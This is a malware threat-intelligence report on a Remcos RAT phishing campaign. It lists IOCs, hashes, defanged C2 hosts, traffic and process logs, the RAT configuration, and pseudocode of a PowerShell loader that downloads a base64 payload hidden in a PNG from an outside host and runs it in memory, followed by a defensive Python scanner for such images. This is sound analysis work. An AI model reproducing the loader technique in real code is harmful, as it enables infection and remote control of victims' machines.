- #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
- https://pastebin.com/cud9xwfs
- previous_contact:
- 19/01/24 https://pastebin.com/EvXHfZUB
- 18/01/24 https://pastebin.com/FL2fX362
- 25/12/23 https://pastebin.com/D535PVm3
- 21/12/23 https://pastebin.com/samYnJq6
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: 25 Jan 2024 02:58:03 -0800
- Subject: Fw: Re: Re: Re: Confirmarea comenzii si plata
- From: Mert Tural<contact@ laceys_icu>
- Received: from laceys_icu (HELO mail0_laceys_icu) ([216_9_224_90])
- Message-ID: <20240125025803.5754DAE9059F10D7@ laceys_icu>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035
- File name Copie de plată.docx [ Microsoft Word 2007+ ] !Template Injection
- File size 30.64 KB (31375 bytes)
- SHA-256 1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640
- File name microsoftinteroird___.doc [ Rich Text Format ] !11882 EQUATION
- File size 64.80 KB (66353 bytes)
- SHA-256 d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae
- File name ISOupdate.vbs [ JavaScript ] !Detect sandbox
- File size 156.03 KB (159776 bytes)
- SHA-256 652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9
- File name d3zoY [ JavaScript ] !Base64 2 PowerShell
- File size 47.32 KB (48457 bytes)
- SHA-256 14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1
- File name uwp4241942.png [ PNG image data ] !Stego Loader BASE64_START
- File size 17.73 MB (18594320 bytes)
- SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
- File name CNF.txt [ Reverse Base64 ] !REMCOS encoded payload
- File size 644.00 KB (659456 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR wallpapercave_com /uwp/uwp4241942.png (LOADER)
- 172_232_189_152 /359/CNF.txt (REMCOS)
- C2 top_noforabusers1_xyz : 2424 147_124_215_172 : 2424
- netwrk
- --------------
- 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
- 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
- 172_67_188_27 443 SSLv2 Client Hello
- 172_67_188_27 tau_id 80 HTTP GET /ze87s HTTP/1.1 Mozilla/4.0 (MSOffice 12)
- 172_232_189_152 80 HTTP GET /cdf/microsoftinteroird___.doc HTTP/1.1 Mozilla/4.0 (MSOffice 12)
- 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
- 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
- 172_232_189_152 80 HTTP GET /359/ISOupdate.vbs HTTP/1.1
- 188_114_97_9 paste_ee 80 HTTP GET /d/d3zoY HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- 188_114_97_9 paste_ee 443 TLSv1 Client Hello
- 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
- 172_232_189_152 80 HTTP GET /359/CNF.txt HTTP/1.1
- 147_124_215_172 2424 TLSv1.3 Client Hello
- comp
- --------------
- WINWORD.EXE TCP 172_67_188_27 80 ESTABLISHED
- WINWORD.EXE TCP 172_67_188_27 443 ESTABLISHED
- WINWORD.EXE TCP 172_232_189_152 80 ESTABLISHED
- WScript.exe TCP 188_114_97_9 443 ESTABLISHED
- powershell.exe TCP 104_22_53_71 443 ESTABLISHED
- powershell.exe TCP 172_232_189_152 80 ESTABLISHED
- RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\ISOupdate.vbs"
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command ...
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 172_232_189_152 /359 / CNF.txt
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" *.vbs -Destination C:\ProgramData\svch.vbs
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\bitjt"
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\llzcugmi"
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\wfevvzxcdsr"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2024 13:25
- Path File not found: C:\ProgramData\svch.vbs.exe
- drop
- --------------
- %temp%\Temporary Internet Files\Content.IE5\*\microsoftinteroird___[1].doc
- %temp%\Temporary Internet Files\Content.IE5\*\ze87s[1]
- %temp%\Temporary Internet Files\Content.IE5\*\ISOupdate[1].vbs
- C:\Users\operator\AppData\Roaming\ISOupdate[1].vbs
- %temp%\bitjt
- %temp%\llzcugmi
- %temp%\wfevvzxcdsr
- # # # # # # # #
- additional info
- # # # # # # # #
- powershell load remcos (defanged pseudocode of the observed loader):
- --------------
- imageUrl = 'wallpapercave_com/uwp/uwp4241942.png'
- webClient = System.Net.WebClient
- imageBytes = webClient.DownloadData(imageUrl)
- imageText = UTF8.GetString(imageBytes)
- startFlag = '<<BASE64_START>>'; endFlag = '<<BASE64_END>>'
- base64Command = imageText.Substring(after startFlag, before endFlag)
- commandBytes = Convert::FromBase64String(base64Command)
- loadedAssembly = ::Load(commandBytes)
- type = loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB')
- method = type.'Run'; method.Invoke(172_232_189_152/359/CNF.txt, desativado, svch, C:\ProgramData\, LnkName, RegAsm)
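A defender-side check for the loader pattern described above, added here as an example; it is not code from the paste or from the Remcos loader itself. It searches a file for the `<<BASE64_START>>` / `<<BASE64_END>>` marker pair the paste names, decodes what lies between them, and reports whether the result starts with a PE ("MZ") header; a second helper decodes the "Reverse Base64" form the paste attributes to CNF.txt. The PNG bytes, the fake PE blob and the function names are my own constructed test data and assumptions, not artefacts from this campaign.

```python
"""Scan a file for a marker-delimited base64 payload hidden in an image."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional

START_MARKER = b"<<BASE64_START>>"   # marker names as given in the paste
END_MARKER = b"<<BASE64_END>>"
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


@dataclass
class StegoFinding:
    is_png: bool            # file starts with the PNG signature
    marker_offset: int      # byte offset of the start marker
    end_marker_found: bool  # False when the blob runs to end of file
    encoded_len: int        # base64 characters between the markers
    valid_base64: bool      # False if the span is not decodable
    decoded_len: int
    looks_like_pe: bool     # decoded blob starts with the "MZ" DOS header


def find_marked_base64(data: bytes) -> Optional[StegoFinding]:
    """Return a finding if the start marker is present, otherwise None.

    The loader converts the raw image bytes to text and substrings between
    the markers, so searching the raw bytes for the ASCII markers covers
    the same span without decoding the image.
    """
    start = data.find(START_MARKER)
    if start == -1:
        return None
    begin = start + len(START_MARKER)
    end = data.find(END_MARKER, begin)
    end_found = end != -1
    if not end_found:
        # Truncated download or missing end marker: treat the rest as the blob.
        end = len(data)
    blob = re.sub(rb"\s+", b"", data[begin:end])
    valid = True
    try:
        decoded = base64.b64decode(blob, validate=True)
    except binascii.Error:
        valid, decoded = False, b""
    return StegoFinding(
        is_png=data.startswith(PNG_SIGNATURE),
        marker_offset=start,
        end_marker_found=end_found,
        encoded_len=len(blob),
        valid_base64=valid,
        decoded_len=len(decoded),
        looks_like_pe=decoded.startswith(b"MZ"),
    )


def decode_reversed_base64(text: bytes) -> bytes:
    """The second stage is labelled 'Reverse Base64' in the paste: the base64
    text is stored back-to-front and must be flipped before decoding."""
    cleaned = re.sub(rb"\s+", b"", text)[::-1]
    return base64.b64decode(cleaned, validate=True)


def scan_file(path: str) -> Optional[StegoFinding]:
    with open(path, "rb") as fh:
        return find_marked_base64(fh.read())


# --- constructed sample inputs (hypothetical, not real malware bytes) ---
FAKE_PE = b"MZ" + bytes(62) + b"PE\x00\x00" + bytes(32)
PNG_TRAILER = b"\x00\x00\x00\x00IEND\xaeB`\x82"
SAMPLE_PNG = (
    PNG_SIGNATURE + b"\x00\x00\x00\rIHDR" + bytes(17)
    + START_MARKER + base64.b64encode(FAKE_PE) + END_MARKER
    + PNG_TRAILER
)
CLEAN_PNG = PNG_SIGNATURE + b"\x00\x00\x00\rIHDR" + bytes(17) + PNG_TRAILER
SAMPLE_REVERSED_STAGE = base64.b64encode(FAKE_PE)[::-1]  # stands in for CNF.txt

if __name__ == "__main__":
    print(find_marked_base64(SAMPLE_PNG))
    print(find_marked_base64(CLEAN_PNG))
    print(len(decode_reversed_base64(SAMPLE_REVERSED_STAGE)), "bytes in reversed stage")
```

Point `scan_file` at files pulled from a proxy cache or a quarantined download; a PNG whose marker span decodes to an "MZ" header is a loader carrier regardless of how the image renders, and a hit without the end marker usually means the download was cut short rather than that the file is benign.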
- remcos config
- --------------
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
- "Assigned name": "RemoteHost",
- "Connect interval": "1",
- "Install flag": "Disable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "remcos.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "Rmc-M4OLK2",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035/details
- https://www.virustotal.com/gui/file/1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640/details
- https://www.virustotal.com/gui/file/d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae/details
- https://www.virustotal.com/gui/file/652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9/details
- https://www.virustotal.com/gui/file/14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1/details
- https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
- VR